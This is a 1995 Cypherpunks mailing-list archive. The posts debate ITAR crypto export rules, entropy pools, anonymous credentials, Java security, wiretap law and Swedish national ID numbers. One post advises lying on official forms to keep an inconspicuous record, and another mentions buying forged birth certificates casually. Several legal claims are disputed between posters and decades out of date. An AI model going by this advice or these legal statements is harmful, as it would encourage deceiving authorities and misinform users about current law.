+0800 Subject: on topic!! 
Message-ID: <199511050039.QAA02014@ix9.ix.netcom.com> At 02:17 PM 11/4/95 -0800, VZNuri wrote: >if there were two key elements here, these conversations would probably >largely go away (instead of continually reappear) >- an unambiguous charter >- an active moderator > >unfortunately I suspect that a moderator does exist but he "prefers >to remain anonymous" ("pseudonymous"?). imho that is precisely >how *not* to succeed as a moderator. As an alternative, there was the Cypherwonks list, which worked just that way, and such conversations did rapidly go away :-) What's evolved here instead are a couple of filtered lists, such as cp-lite, where you can get the conversations that one or another monitor considers relevant instead of the whole firehose. It seems to work reasonably well for a lot of people. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From junger at pdj2-ra.F-REMOTE.CWRU.Edu Sat Nov 4 16:56:59 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Sun, 5 Nov 1995 08:56:59 +0800 Subject: using PGP only for digital signatures In-Reply-To: Message-ID: Simon Spero writes: : It seems that licences allowing foreign nationals access to cryptographic : software within the US are pretty easy to get, and especially for : something like PGP on a central machine. Really? Would you please explain how one can apply for such a license? To say nothing about how one can actually get one? Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu From weidai at eskimo.com Sat Nov 4 17:10:47 1995 From: weidai at eskimo.com (Wei Dai) Date: Sun, 5 Nov 1995 09:10:47 +0800 Subject: /dev/random - using up entropy? 
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com> Message-ID: On Sat, 4 Nov 1995, Bill Stewart wrote: > Most of the designs I've seen look like this: > A Reservoir of entropy R = R1....Rn, where n is large, 1024 or 4096 > An input stream I = I1....Ik, which is mixed into R > A mixing function F which is used to mix R <= F(R,I) > for some chunk of I, possibly empty. > A hash function H, typically MD5. > An output O = O1...Om = H(R), and E gets mixed after every output. > (These are capital-o, not zero...) I believe PGP uses this approach. An implementation of it can also be found in Crypto++ as randpool.cpp. From ses at tipper.oit.unc.edu Sat Nov 4 17:12:18 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sun, 5 Nov 1995 09:12:18 +0800 Subject: using PGP only for digital signatures In-Reply-To: Message-ID: On Sat, 4 Nov 1995, Timothy C. May wrote: > Therefore, there are few ways that citizenship can be "checked." Period. A > foreigner who wishes to "prove" his non-U.S. status could, of course, show > his green card. But this is different from proving citizenship. > And here we have the rub. People with permanent residency (i.e. green cards) are fully entitled to access to strong crypto. Most foreign students are on J-1 visas, which do not grant permanent residency. Simon From llurch at networking.stanford.edu Sat Nov 4 17:16:43 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sun, 5 Nov 1995 09:16:43 +0800 Subject: [ID point semi-off-topic] Re: using PGP only for digital signatures In-Reply-To: Message-ID: On Sat, 4 Nov 1995, Timothy C. May wrote: > Pop Quiz: If you are a citizen of the U.S., prove it. >... > As has been said several times recently, for the purposes of law, non-U.S. > citizens who reside in the U.S are effectively "U.S. persons." Subject to > U.S. law and generally having the same legal rights. (Can't vote. Can be > drafted. Must pay taxes. Must have a SSN. Must obey traffic laws. 
Must not > discriminate against the differently clued, etc.) All true. > Consider this: most people in the U.S. do not have a "credential" that > shows them to be U.S. citizens. (Hint: most people in the U.S. do not have > passports.) They have driver's licenses, which say nothing about > citizenship (at least California and Virginia licenses do not). Social > Security cards are the same. > > (Second hint: most people are hard-pressed to locate a birth certificate > for themselves. Many people take the easy way out and simply buy a new one > for the $25 a good one costs.) > > Therefore, there are few ways that citizenship can be "checked." Period. A > foreigner who wishes to "prove" his non-U.S. status could, of course, show > his green card. But this is different from proving citizenship. A green card, by itself, also fails to prove legal status. Proving legal residency requires a combination of two documents, one each from specified lists. Most commonly a driver's license, green card (which is actually pink), or birth certificate from list A, and a social security card from list B. Chris Hibbert's SSN FAQ talks a little bit about how this works, and why it's a Good Thing. Basically, for privacy and security reasons, it is a very good idea to separate the issues of identity and authorization. I don't care how securely you can authenticate who I am -- by PGP, retinal scan, whatever. I do not want a single digitizable token to be the key to my identity. Even if that identity cannot be forged (and everything can be forged), it can be used to track me, by the government, by the Direct Marketing Association, by the private investigators of certain wacky cults, and by TRW. And I suppose by those secret government types at SAIC who, we are told, control the Internet now :-) It is a little inconvenient, but this is why it's a Good Thing that you need a separate driver's license, social security card, credit card, phone number, PGP key, password, thumbprint, and retina. 
I would oppose moves to combine them to a single unified "mark of the beast," as it were. I am a little uneasy about the otherwise very cool First Bank of the Internet for this reason. If you use FBOI, I'd recommend using a PGP key separate from your usual PGP key. Crypto fans need to recognize that the ability to securely prove your identity is not an unmitigated advance. Of course, all the crypto fans here are also pseudonym fans. > As to the point about students impersonating faculty, if the faculty starts > signing their messages (doubtful), then no one can impersonate _them_. > (Except that it sounds like all this PGP stuff is to happen on campus > computers, in which case there are several ways their private keys and > passphrases can be snarfed.) The issue of a "credential" for faculty > members, something that says "This person is a member of the Foo U. > faculty," well, this is a different kettle of fish; such credentials are > not part of the PGP system, though webs of trust could in principle be used > in a klugey kind of way. This is a job for private key cryptography, like kerberos. -rich From tcmay at got.net Sat Nov 4 17:40:28 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 09:40:28 +0800 Subject: To Repeat: Credentials Not Considered Necessary Message-ID: At 1:03 AM 11/5/95, Simon Spero wrote: >On Sat, 4 Nov 1995, Timothy C. May wrote: > >> Therefore, there are few ways that citizenship can be "checked." Period. A >> foreigner who wishes to "prove" his non-U.S. status could, of course, show >> his green card. But this is different from proving citizenship. >> > >And here we have the rub. People with permanent residency (i.e. green >cards) are fully entitled to access to strong crypto. Most foreign >students are on J-1 visas, which do not grant permanent residency. Irrelevant. 
J-1 persons are still accorded the basic rights of citizens, save for a few things like voting, holding certain offices, and perhaps jury duty (not sure about this, as my recent jury summons was apparently based on my Calif. Driver's License and required no form of identification whatsoever). My basic point was that "J-1," "permanent resident," "citizen," "undocumented," and "completely and totally without proper papers" are, for the purposes being discussed here, all essentially identical. Any sysadmin who expects to have papers proving "citizenship" or any other status will have a tough time. Saying "People with permanent residency (i.e. green cards) are fully entitled to access to strong crypto." and--presumably--implying that J-1 visa holders are _not_ entitled to use strong crypto within the U.S. (or, for that matter, in their own countries, but this is another issue), is misleading. The laws about "showing a foreign national" certain items do not differentiate, so far as I have seen, between various kinds of visas. In any case, sysadmins generally do not ask for any kind of ID or proof of citizenship, morality, residency, etc. (On my many computer accounts over the years, as but one example, _never_ have I been asked for credentials of any kind. Never. Not even a driver's license, let alone a passport or birth certificate or whatever. My current Internet Service Providers, netcom.com and got.net, are blithely uncaring about the fact that I am technically a citizen of Ruritania, and am not in the U.S. legally.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. 
"National borders are just speed bumps on the information superhighway." From tcmay at got.net Sat Nov 4 17:53:11 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 09:53:11 +0800 Subject: Credentials Without Identity Message-ID: Rich Graves makes some very good points, but he said something I want to riff on. (And as a measure of how apologetic some folks are getting about discussing anything not on Perry's List of Approved Topics, Rich unfortunately labeled his post "[ID point semi-off-topic]..." In fact, the issue of credentials and identity is NOT off-topic, not even semi-off-topic. It is central to the themes of our list. I urge all to read Chaum's seminal work on "credentials without identity.") At 1:05 AM 11/5/95, Rich Graves wrote: >Proving legal residency requires a combination of two documents, one each >from specified lists. Most commonly a driver's license, green card (which >is actually pink), or birth certificate from list A, and a social >security card from list B. > >Chris Hibbert's SSN FAQ talks a little bit about how this works, and why >it's a Good Thing. Basically, for privacy and security reasons, it is a >very good idea to separate the issues of identity and authorization. > >I don't care how securely you can authenticate who I am -- by PGP, retinal >scan, whatever. I do not want a single digitizable token to be the key to >my identity. Even if that identity cannot be forged (and everything can be >forged), it can be used to track me, by the government, by the Direct >Marketing Association, by the private investigators of certain wacky .... Chris's (or Chris') points are admirable, but getting more and more irrelevant by the day. The notion of unlinking identity and authorization by separate pieces of identification is another form of "security through obscurity." The two forms of credentials can be linked in data bases. 
Just because one piece of ID has citizenship or voting status and another has other stuff is meaningless, provided the ID forms can be linked. As they can, in multiple ways. The credit tracking agencies can do this trivially, with names, social security numbers, driver's license numbers, addresses, phone numbers, etc. All are pointers into the cloud of numbers that constitutes one's dossier. Happily, Chaum's work on "credentials without identity," based essentially on the kind of "blinding" used in digital cash (with some differences, of course), allows for one to display a credential showing one is old enough to enter a bar or library (in 2005), without revealing a name (which is just another credential). --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From loofbour at cis.ohio-state.edu Sat Nov 4 18:07:07 1995 From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow) Date: Sun, 5 Nov 1995 10:07:07 +0800 Subject: The Crypto Applications we would rather not talk about In-Reply-To: <199511041900.UAA27770@utopia.hacktic.nl> Message-ID: <199511050200.VAA11644@hammond.cis.ohio-state.edu> Name Withheld by Request writes: > Crypto and Privacy tools protect everyone > from the hero to the anti-hero... > > the technology itself is neutral Unfortunately, the technology's appearance is distinctly angled toward the anti-hero. One, because the benefits are more obvious to the anti-hero; and two, because the abuse of technology gets better press than its use, particularly in the get-tough-on-crime era. 
> The answers are there and have been published > in most books on tradecraft, 3 person cells organized > as pyramids. I've read only fictional accounts about the 3-person cell. Any pointers to nonfiction material? "Tradecraft" didn't seem to be the magic keyword in the local card catalog. nathan From anonymous-remailer at shell.portal.com Sat Nov 4 18:12:55 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 5 Nov 1995 10:12:55 +0800 Subject: Sun speaks out - but not to the cypherpunks Message-ID: <199511050203.SAA01370@jobe.shell.portal.com> Todd Glassey writes: > Pardon the flame but I really have just about heard enough of this BS... No one needs to listen to anything if they don't want to, Todd, but I think that some things need saying none the less. I think the old saying is: You can lead a horse to water, but you can't make him think, or something like that ... >>This response came from Sun to Risks: >> >>> Date: Mon, 16 Oct 1995 21:22:40 -0700 >>> From: Caveh.Jalali at eng.sun.com (Caveh Jalali) >>> Subject: Re: Risks in Java >>> >>> If we are going to "analyze" java security, let's keep in mind that >>> there is an important distinction between the language (java) and the >>> machinery which runs the java program. Hmm, this is a very interesting perspective, coming from Sun Engineering as it were. The company that says that the Network is the machine, or somesuch. I always thought that security consisted of everything: hardware, software, and wetware. (Or it did the last time, I checked my handbook.) Admittedly this is a horrible inconvenience, especially when it comes to security. >>> Java is a general-purpose programming language along the lines of C/C++. >>> So, there is no doubt that its expressive power overwhelms our >>> theoretician's abilities to predict java-programs behavior -- this is >>> where we start getting into the halting problem, computability and other >>> black magic. 
Basically, i don't think we can "trust" programs >>> written in any *useful* programming language. >> >>Read: We can't trust Java programs. This may well be true. But sloppy design, design which ignores the most basic difficulties cannot be brushed away by simply saying that "it exceeds theoretician's predictive abilities." That simply doesn't cut it. "Ignoring the obvious" is simply that. It's a planned process of "ignoring the obvious". One example of this that should serve as a useful case study is a recent problem which was brought to the Canadian public's attention just this week, on a program called the Fifth Estate. The CBC (Canadian Broadcasting Corporation) detailed a software code problem in one of AECL's (Atomic Energy of Canada Limited's) instruments which deliver penetrating radiation. The software which controlled the radiation dose, would periodically override the oncologist's calibration and deliver a radiation dose 100 times what was prescribed. This software "bug" literally killed wherever the machine was in use. A simple hardware solution engineered into the product as part of a redundancy check program would not only have saved many lives, but could have confirmed that there were serious code deficiencies. A redundancy program which AECL did NOT have. Then again AECL did not consider that it had to mathematically prove its code either. So I guess, they "ignored the obvious" not once, but twice. A simple lesson can be learned here, one which I believe is applicable to Java. If your parameters are going to be that you cannot trust your production code, then you MUST engineer on that basis, that the production will not be trustworthy, rather than simply crying like Chicken Little, that mission critical applications must simply "live with" engineered inferiority. Or alternatively, another lesson could be pulled out: To avoid this problem, ensure that your code is mathematically provable or utilize appropriate hardware overrides. 
Case study, #2: Netscape. During their code design, they assumed that all servers on a network were trustworthy and would continue to be trustworthy. They designed their product on that basis. In fact, over time the very opposite will be true. As an exploitation algorithm propagates, the significant percentage of servers which are NOT trustworthy will begin to grow exponentially. The true assumption which Netscape should have started with is a simple one, and is the only assumption that ANY production house can start with: that the network has a reliable transport mechanism, one which will route around damage. That's it. Any other assumptions are poor design and engineering and are demonstrative of a misunderstanding of the environmental conditions in which the engineered product is expected to perform. >Dr. Fred, you seem to spend a lot of energy slamming Java and HotJava. Are >you unaware that the HotJava Platform is the first generation pass at an >inline extensible GUI harness. Underline the total concept "extensible GUI >harness". This includes a series of tool functions to *help* perform secure >messaging (like those supplied in Netscape 2.0/Java.), but because of the >enormity of the task and the number of facets on the face of this gem it >will be some time before the final versions of the first generation will be >available. I can't speak for "Dr. Fred", but I always worry when people start to refer to something as a "gem", and start talking about the "enormity of the task". Especially if an engineer starts talking in such lyrical, flowery prose. Enormous tasks always lead to complexity which can never be solved by simple linear thinking. And the engineer from Sun is right, that it will be some time before first generation products are available. (This will certainly be the case if "mathematical proofs" become mandatory as part of an ACT in Action plan. ) >No one else had been working on this piece of technology before SMCC >started their effort. 
From the word floating about the SMCC labs they >didn't even know what they had. > >So rather than slamming them, SMCC, or their PR folks for Well, I'd rather that marketers stick to marketing AFTER a product development cycle is completed. Generally, you would think (hopefully) that people who are technologists, just *might* have a better knowledge of what they have, (or don't have) wouldn't you? Maybe?? Or maybe not ... After all you wouldn't want some kid, some little snotty brat, some kid who started playing around well over a decade ago -- when he was in his teens -- as a projadmin on one of Honeywell's Multiplexed Information and Computing Service beasts showing you up for your temerity? Or would you cry about the "kid" slamming you? >I hope that you understand my point?. The net/net is that OLTP needs to be >scaleable to be a saleable commodity and without the ability to do >"java-ish" like local applets... There is no clean way to do this, Well if we're gonna bottom line it, and talk turkey, and leave Chicken Little back at the table, skewered as it were, I'll extend a helping hand. The net/net is really, really simple, a product that doesn't perform as advertised is not a saleable commodity. No one buys cars which don't start or cans that leak. Sure you can have a body by Pininfarina or one by Alcan but if the engineering isn't there under that beautiful skin then you don't have ANYTHING TO OFFER FOR VALUE. >As an aside - What blows my mind is the number of cycles people spend >bitching and moaning about Java itself rather than working to create a >better solution. Well. It's just not my responsibility to create a solution. And I have a tendency not to "bitch and moan". I might be one sarcastic castrating SOB, but bitchy and moany is not something I'm routinely accused of. I simply have a reputation for a degree of frankness. Nothing personal is meant by it. I'm actually a very nice person. Truly.;-I >I just want to say "Get a clue. 
Moan about something that is important and >pertinent to the technologies at hand". > > >These comments are my own - Appreciated. And I mean that with sincerity that your comments are appreciated. I understand that each person here DOES express their individual opinions. Sometimes some very strong opinions. Myself included. Generally, wallflowers will not find comfort on this list. We'll recommend that those people should stick to writing browser programs. Oops, scratch that last thought ... >Sincerely, >Todd Glassey >todd at lgt.com Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From ho at cs.arizona.edu Sat Nov 4 18:35:39 1995 From: ho at cs.arizona.edu (Hilarie Orman) Date: Sun, 5 Nov 1995 10:35:39 +0800 Subject: Photuris Primality verification needed In-Reply-To: <1973.bsimpson@morningstar.com> Message-ID: <9511050229.AA00198@uncial.CS.Arizona.EDU> > Recently, someone asked for a smaller prime of only 512-bits for speed. > This is more than enough for the strength of keys needed for DES, 3DES, > MD5 and SHA. Perhaps this would be easier to have more complete and > robust verification as well. Depending on what you think of the strength of those algorithms, the 512-bit mod p system may not be strong enough. The *strength* of 512-bit mod p DH systems is only about 56 bits. You need 1024-bit primes for a *strength* of 80 bits. In contrast, the 155-bit elliptic curve in the Photuris draft has a strength of about 76 bits. From llurch at networking.stanford.edu Sat Nov 4 18:51:28 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sun, 5 Nov 1995 10:51:28 +0800 Subject: Credentials Without Identity In-Reply-To: Message-ID: On Sat, 4 Nov 1995, Timothy C. May wrote: > (And as a measure of how apologetic some folks are getting about discussing > anything not on Perry's List of Approved Topics, Rich unfortunately labeled > his post "[ID point semi-off-topic]..." 
In fact, the issue of credentials > and identity is NOT off-topic, not even semi-off-topic. It is central to > the themes of our list. I urge all to read Chaum's seminal work on > "credentials without identity.") Thanks for the newbie correction. In case anyone else is new to this, I couldn't find that paper, but Chaum's ideas and references are at http://www.digicash.com/publish/sciam.html > >Proving legal residency requires a combination of two documents, one each > >from specified lists. Most commonly a driver's license, green card (which > >is actually pink), or birth certificate from list A, and a social > >security card from list B. > > > >Chris Hibbert's SSN FAQ talks a little bit about how this works, and why > >it's a Good Thing. Basically, for privacy and security reasons, it is a > >very good idea to separate the issues of identity and authorization. > > > >I don't care how securely you can authenticate who I am -- by PGP, retinal > >scan, whatever. I do not want a single digitizable token to be the key to > >my identity. Even if that identity cannot be forged (and everything can be > >forged), it can be used to track me, by the government, by the Direct > >Marketing Association, by the private investigators of certain wacky > .... > > Rich's (or Chris') points are admirable, but getting more and more > irrelevant by the day. The notion of unlinking identity and authorization > by separate pieces of identification is another form of "security through > obscurity." True. But until digital technology becomes ubiquitous, we're stuck with it, and it does help. I see no analog, well, analog to credential technology. It absolutely requires machines that can generate and handle large random numbers. Right? My point was, even people who should know better, like the managers and clients of FBOI (fboi at netcom.com), are relying on security through appeal to irrelevant crypto authority, which is even worse. 
Using your primary pgp key as a traceable link to your credit card number or bank account can be just as bad as publishing your credit card number. > Happily, Chaum's work on "credentials without identity," based essentially > on the kind of "blinding" used in digital cash (with some differences, of > course), allows for one to display a credential showing one is old enough > to enter a bar or library (in 2005), without revealing a name (which is > just another credential). I haven't yet fully digested this concept, but don't you get into a bit of a chicken-and-egg problem when you start applying this to things like proof of age and citizenship? Until you reach a certain age, you're not going to remember your passphrase. I still think there's a role for private keys held by some authority (I realize that's not a popular word). I'd guess this would be addressed by a "secret sharer"/secsplit kind of thing, where your parents hold a combination of keys that together can represent your secret key until you're old enough to change it yourself. Still I'd worry about what kind of information was gathered about me in my youth, and how that might be carried over into maturity. -rich From llurch at networking.stanford.edu Sat Nov 4 19:00:35 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sun, 5 Nov 1995 11:00:35 +0800 Subject: [NOISE] Re: 800_ape [FUQ Win95 List] In-Reply-To: Message-ID: > On Sat, 4 Nov 1995, Rich Graves wrote: > > > I'm putting together a "Windows 95 Frequently Unanswered Questions File." This little P.S. attracted a lot of attention in private email. FYI, it's now available at: gopher://quixote.stanford.edu:70/0R1400265-1416663-/win95netbugs and in the newsgroups. It's short. Several points are of interest, if not direct relevance. Point D.8., apparent bugs in handling of longints, if confirmed, could have beaucoup crypto relevance. For the record, I hadn't noticed the acronym, but I like it. A lot. 
-rich From tcmay at got.net Sat Nov 4 19:17:52 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 11:17:52 +0800 Subject: That's not what I wrote! Message-ID: Some of you may think this is a trivial correction, but I think it important, albeit bizarre: At 2:41 AM 11/5/95, Rich Graves wrote: >On Sat, 4 Nov 1995, Timothy C. May wrote: >> Rich's (or Chris') points are admirable, but getting more and more >> irrelevant by the day. The notion of unlinking identity and authorization >> by separate pieces of identification is another form of "security through >> obscurity." No, that is NOT what I wrote. It has been changed, with no indication that it is not what I wrote. If you check my original you'll find that what I wrote was: --- Chris's (or Chris') points are admirable, but getting more and more irrelevant by the day. The notion of unlinking identity and authorization by separate pieces of identification is another form of "security through obscurity." --- I can guess why Rich "corrected" my post, but he was in error for at least two reasons. First, because he didn't indicate that he'd corrected me. Second, because my item did not need correction. I originally wrote "Chris's," referring to Chris Hibbert, and then thought about the grammatical rules about forming possessives out of words ending in "s," and so I added the alternative "(or Chris')". Perhaps a minor point, and not one I'll lose sleep over, but I think it a bad thing to _ever_ correct the words of another in quoted material without indicating so. Editors who worry about typos and misspellings in quoted material usually put a "[sic]" in the text, mainly, I think, to let themselves off the hook for letting an error through. (Though I think another reason is to show graphically the igorance [sic] of the quoted author.) 
This point about Rich's post should not distract from his good comments that I responded to (or the points in the post that contained this correction, points I have not yet read).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May                | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA                | knowledge, reputations, information markets,
Higher Power: 2^756839        | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Sat Nov 4 19:28:38 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 11:28:38 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID:

At 2:00 AM 11/5/95, Nathan Loofbourrow wrote:

> > The answers are there and have been published
> > in most books on tradecraft, 3 person cells organized
> > as pyramids.
>
>I've read only fictional accounts about the 3-person cell. Any
>pointers to nonfiction material? "Tradecraft" didn't seem to be the
>magic keyword in the local card catalog.

It's easy to work out the relationships from first principles...I'm not sure what a book would add to your understanding.

I suspect Kahn's "The Codebreakers" contains at least a brief mention of cell organizations, though that was not Kahn's focus. Or, look at any of the various books on Soviet spy rings in the U.S., or various spy rings in WW II.

For example, I think the true-life book "I Led Three Lives" might still be available--it was the basis of a t.v. show I used to watch in the early 60s. (The t.v. show presumably went to the same Politically Incorrect resting place as "Amos and Andy," mourned by Sapphire, The Kingfish, and me.)

--Tim

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From shamrock at netcom.com Sat Nov 4 19:34:56 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 5 Nov 1995 11:34:56 +0800 Subject: Telephone switch capacity -Reply Message-ID: At 18:43 11/3/95, Rich Graves wrote: >[about the FBI supposedly wanting the ability to tap 1% of all phones in >the US simultaneously] [...] >Of course the FBI doesn't have the staff to listen to all these lines, and >they need an individual court order to authorize each individual >interception, so this numbers game is a bit of a joke. One more time. Despite what you read in the papers, despite what most people - even in the legal profession - believe, telephone wiretaps do _not_ require a court order. They haven't required a court order in over a year. The Digital Telephony Bill, which passed Congress by an overwhelming margin, _explicitly_ allows for wiretap authorizations other than a court order. The law does not impose any rules for these "other forms of authorization". "The captain signed it off" may suffice. -- Lucky Green PGP encrypted mail preferred. From junger at pdj2-ra.F-REMOTE.CWRU.Edu Sat Nov 4 19:46:56 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Sun, 5 Nov 1995 11:46:56 +0800 Subject: To Repeat: Credentials Not Considered Necessary In-Reply-To: Message-ID: Timothy C. May writes: : At 1:03 AM 11/5/95, Simon Spero wrote: : >And here we have the rub. People with permanent residency (i.e. green : >cards) are fully entitled to access to strong crypto. Most foreign : >students are on J-1 visas, which do not grant permanent residency. 
:
: Irrelevant.
:
: J-1 persons are still accorded the basic rights of citizens, save for a few
: things like voting, holding certain offices, and perhaps jury duty (not
: sure about this, as my recent jury summons was apparently based on my
: Calif. Driver's License and required no form of identification whatsoever).

It is however a violation of the ITAR to disclose cryptographic software (including algorithms) to students on a J-1 visa, but not to someone who has a green card.

: Saying "People with permanent residency (i.e. green cards) are fully
: entitled to access to strong crypto." and--presumably--implying that J-1
: visa holders are _not_ entitled to use strong crypto within the U.S. (or,
: for that matter, in their own countries, but this is another issue), is
: misleading.

It is--if the ITAR is constitutional--a serious felony to give J-1 visa holders access to strong--and to weak--crypto, but no one has implied that they are not entitled to use it. Nothing in the law of the United States says that foreign persons can't get crypto, it is just a felony to disclose it to them (within or without the United States).

: The laws about "showing a foreign national" certain items do not
: differentiate, so far as I have seen, between various kinds of visas.

The ITAR distinguishes between foreign persons, who are not U.S. persons, and U.S. persons who are either United States citizens or have a visa admitting them to permanent residency in the United States. The crime at issue is disclosing cryptographic software to foreign persons. And whether one is a foreign person does depend on what type of visa one has (if one is not a U.S. citizen).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From perry at piermont.com Sat Nov 4 20:34:58 1995
From: perry at piermont.com (Perry E.
Metzger)
Date: Sun, 5 Nov 1995 12:34:58 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511050428.XAA06831@jekyll.piermont.com>

amp writes:
> i want a source of data for use as a otp. i don't want to have to
> hook up any external devices to my pc to do it. (although some of the
> methods mentioned in the past few days are quite interesting.)
>
> i'd like to know if there was a reason not to use the output of pgp
> to do it.

Yes. What you have then is just an elaborate cipher that is not a one time pad. For it to be a one time pad, the numbers must be truly random and generated only once, period.

> i would think that the output of pgp should be pretty darn random.

If PGP is good enough for use as a source for cipher keying material, then you needn't use it as a one time pad -- just use PGP directly. If PGP isn't good enough, it certainly isn't good enough for use as cipher keying material.

In either case, it is NOT NOT NOT a one time pad if it isn't truly random numbers -- that means physically random.

Perry

From nbrodbeck at hollandhart.com Sat Nov 4 20:41:27 1995
From: nbrodbeck at hollandhart.com (Noah Brodbeck)
Date: Sun, 5 Nov 1995 12:41:27 +0800
Subject: Telephone switch capacity
Message-ID:

Please be aware that the current capacity of the telephone system in the United States (and for that matter, most of the developed world) is only capable of supporting between 15 and 20 percent simultaneous telephone conversations. If the FBI wishes to set up a system that is capable of monitoring 1% of the total number of lines, that equates to an ability to tap 5%, not 1% of all calls in progress.

>As the FBI's "interest" shifts from area to area, the whole
>country could rapidly come under the 1% surveillance
>directive.
>1.5 million telephone intercepts. Or more.

-=- Noah

From fc at all.net Sat Nov 4 20:41:59 1995
From: fc at all.net (Dr. Frederick B.
Cohen)
Date: Sun, 5 Nov 1995 12:41:59 +0800
Subject: Real randomness generators
Message-ID: <9511032132.AA00195@all.net>

Two points:

1 - The noisiest thing on most lists is the noise about other peoples' noise.

2 - Why not use the postings of people complaining about other peoples' posts as a source for noise. Surely few things in the Universe are more random.

On the subject at hand:

There are two major technical issues I have encountered in using EM waves (which is what video and radio noise are) for generating randomness.

1 - They tend to be biased toward 1 or 0. This can often be compensated for by (for example) xoring one bit stream from the same source with the inverse of another. By doing this enough times, you can eliminate many of the characteristics of interest.

2 - Noise tends to be characteristic for different media and noise causes. This is a more difficult issue. For example, certain types of media tend toward short noise bursts. In these cases, you have to be quite careful to assure that the bit streams meet the randomness criteria of the application.

As a side issue, you may find that once you start sending enough information with truly random characteristics, you will be visited by people that don't want you sending it. I know people who have experienced these visitations and felt highly constrained as a result.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From asgaard at sos.sll.se Sat Nov 4 20:43:55 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Sun, 5 Nov 1995 12:43:55 +0800
Subject: Credentials Without Identity
In-Reply-To:
Message-ID:

On Sat, 4 Nov 1995, Timothy C. May wrote:

> The credit tracking agencies can do this trivially, with names, social
> security numbers, driver's license numbers, addresses, phone numbers, etc.
> All are pointers into the cloud of numbers that constitutes one's dossier.

Ah, the Swedish way is so much more convenient.
Directly after birth you get a tag around your arm, with a number that is later changed to an entry into several databases, including 'Birth Registry' and you get your Person Number for life, in the format YYMMDD-abcd, which is unique (at least in Sweden). All forthcoming database entries are based on this number, usually as a first key field. Surprise immigrants get a preliminary number at the border (other format) and a genuine one if later accepted.

Without a Person Number you would be practically helpless: no schooling, no drivers licence, no 'social benefits', no bank account, no job (if your employer intends to do it legally and cut off taxes). The only marginally possible way to get around this is to use the Person Number of another person (forging a Swedish Approved ID is quite a task, though, and it's not very kind to that other person).

Most Government databases are open to the public, so the credit tracking agencies don't have to work very hard regarding persons (sometimes a bit more with corporate entities; those can be registered to fall guys - not hard to find in a jurisdiction with nice jails and short sentences).

Now, there are laws against cross-referencing various databases without the approval of the Data Inspection, which often says no. But if you do it illegally, there is very little risk of detection.

It looks like the Approved ID will be a smart-card with a signing mechanism (probably escrowed), naturally linked to the Person Number, real soon now, at least before the mythical y.2000 . Links to physical characteristics (retina?) are not (openly) discussed yet but may eventually come into play.

I think there's not much to win (and a lot of conveniency to lose) in trying to hide from this System.
A friend of mine, and his wife, had their baby born at home and hid it from the System for several years (losing good money from the Social Security system in that process - in Sweden all people get many 'benefits'= transferred tax money, regardless of income) but eventually they registered the child, of course. It was a mere gesture.

Solution:

1) Don't fight the inevitable, like Don Quixote (sp?) did. The trick is to keep one's database entries as unsuspicious as possible. Pay politically correct items and services with a credit card, but use cash in transfers that the current (and possibly a coming, more Orwellian) regime might consider to be disloyal. Don't refuse to fill in forms or answer questions which are more or less obligatory or that might give you some benefits - just lie if necessary to create a normal, inconspicuous profile.

2) Prepare for Crypto Anarchy. Create untrackable net aliases for future use. Keep informed of all the tricks to bypass coming futile attempts to link net pseudonyms to Person Numbers (or physical characteristics). Enjoy (and help create and protect) the virtual sanctuary with digital mixes and anonymous http proxies (and DC-nets or something better eventually).

Mats

From ses at tipper.oit.unc.edu Sat Nov 4 21:40:58 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Sun, 5 Nov 1995 13:40:58 +0800
Subject: using pgp to make an otp
